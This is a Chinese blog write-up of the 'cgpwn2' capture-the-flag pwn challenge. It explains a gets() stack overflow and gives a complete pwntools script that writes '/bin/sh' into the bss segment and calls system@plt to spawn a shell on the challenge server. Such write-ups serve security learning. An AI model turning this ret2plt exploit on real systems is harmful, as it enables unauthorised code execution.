美文网首页
cgpwn2攻防世界pwn

cgpwn2攻防世界pwn

作者: 杰_74 | 来源:发表于2019-08-09 10:59 被阅读0次

checksec后试运行,有两个输入


32位ida


点进去hello()




可以利用fgets和gets栈溢出

发现pwn函数里有system,参数不对,system在plt地址为0x08048420



shift+F12找字符串,这次就找不到binsh了,看来要想办法写进去


第一次输入的name在bss段,地址为0x0804A080



第二次输入时gets函数,在plt地址为0x080483F0


那我们就在第一次输入把/bin/sh用fgets写进去,第二次利用gets的栈溢出调用syste(/bin/sh)

写脚本

#coding=utf8
from pwn import *
context.log_level = 'debug'
p = remote('111.198.29.45',47419)

system_plt = 0x08048420
bss = 0x0804A080

p.recvuntil('name')
p.sendline("/bin/sh")
p.recvuntil('here:')

payload = ''
payload += 'A'*0x26
payload += p32(0)
payload += p32(system_plt)
payload += p32(0)
payload += p32(bss)

p.sendline(payload)
p.interactive()
成功

相关文章

  • cgpwn2攻防世界pwn

    checksec后试运行,有两个输入 32位ida 点进去hello() 可以利用fgets和gets栈溢出 发现...

  • 2019-05-30 新手练习区完结

    至此攻防世界的pwn新手练习区完结了

  • hello_pwn攻防世界pwn

    checksec然后试运行 放入64位ida,看看main函数 点击read函数里的unk_601068,再点击i...

  • 攻防世界 Pwn wp

    0x01get_shell 下载附件后直接丢IDA F5 0x02CGfsb 先用checksec查看开了哪些保护...

  • 攻防世界 cgpwn2 wp(CGCTF)

    0x01寻找漏洞 checksec ida分析 进入hello函数 发现gets(&s)处存在栈溢出 0x02分析...

  • 攻防世界新手练习pwn

    0x00 get_shell 0x01 CGfsb 首先检查保护 nc连接输入信息为aaaa加很多个控制字符发现p...

  • 攻防世界高手进阶pwn

    歇了很长一段时间,终于开始了我的攻防世界pwn之路。立一个flag:每日一题,只能多不能少。 0x00 dice_...

  • level3攻防世界pwn

    checksec level3./level3 ida,无system无binsh,要通过泄露write函数来泄露...

  • level0攻防世界pwn

    checksec然后试运行 放入64位IDA,F5大法 发现callsystem函数 找到callsystem的地...

  • level2攻防世界pwn

    checksec后试运行 放入64位ida 发现system,但参数不对,那我们shift+F12查看字符串,发现...

网友评论

      本文标题:cgpwn2攻防世界pwn

      本文链接:https://www.haomeiwen.com/subject/rgscjctx.html